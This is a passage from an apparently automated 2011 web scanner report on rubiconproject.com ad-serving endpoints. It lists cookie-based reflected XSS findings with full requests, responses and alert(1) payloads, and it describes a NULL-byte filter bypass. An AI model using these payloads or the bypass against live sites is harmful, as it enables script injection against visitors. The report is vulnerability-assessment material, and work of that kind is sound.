Set-Cookie: ses2=12338^127&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63910; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3251

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=b8e59"-alert(1)-"1786733ad33\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.85. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef72"><script>alert(1)</script>8a74264af07 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=eef72"><script>alert(1)</script>8a74264af07; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:21 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^35; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63638; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2660

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=eef72"><script>alert(1)</script>8a74264af07" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.86. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90db"-alert(1)-"d0e5f6c768a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7856/12590/22782-15.js?cb=0.7701902575790882&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=d90db"-alert(1)-"d0e5f6c768a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:45 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^114; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63914; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2952

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=d90db"-alert(1)-"d0e5f6c768a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.87. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c04"><script>alert(1)</script>028f1bd7c76 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=48c04"><script>alert(1)</script>028f1bd7c76; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:14 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9&12590^50; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63825; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=48c04"><script>alert(1)</script>028f1bd7c76" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.88. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3ca"><script>alert(1)</script>f299631d149 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=bc3ca"><script>alert(1)</script>f299631d149; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^67; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63922; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bc3ca"><script>alert(1)</script>f299631d149" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.89. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742b8"><script>alert(1)</script>a8c3bae217f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=742b8"><script>alert(1)</script>a8c3bae217f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^56; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63893; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=742b8"><script>alert(1)</script>a8c3bae217f" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.90. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55008"-alert(1)-"715ba0f9f06 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=55008"-alert(1)-"715ba0f9f06; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=46; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^117; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63880; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1595

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3155685"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=55008"-alert(1)-"715ba0f9f06\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.91. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ab72"-alert(1)-"f00a1aa43f9 was submitted in the ruid cookie. This input was echoed as 8ab72"-alert(1)-"f00a1aa43f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.7374124012421817 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=%008ab72"-alert(1)-"f00a1aa43f9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk15=0; ses15=12338^5&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^7&12590^4; csi2=3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

3. Flash cross-domain policy previous next
There are 69 instances of this issue:

http://ad.agkn.com/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://adfarm.mediaplex.com/crossdomain.xml
http://adsfac.us/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://bid.rb.ntc.ace.advertising.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://cdn4.eyewonder.com/crossdomain.xml
http://content.yieldmanager.edgesuite.net/crossdomain.xml
http://d3.zedo.com/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://e.yimg.com/crossdomain.xml
http://edge.aperture.displaymarketplace.com/crossdomain.xml
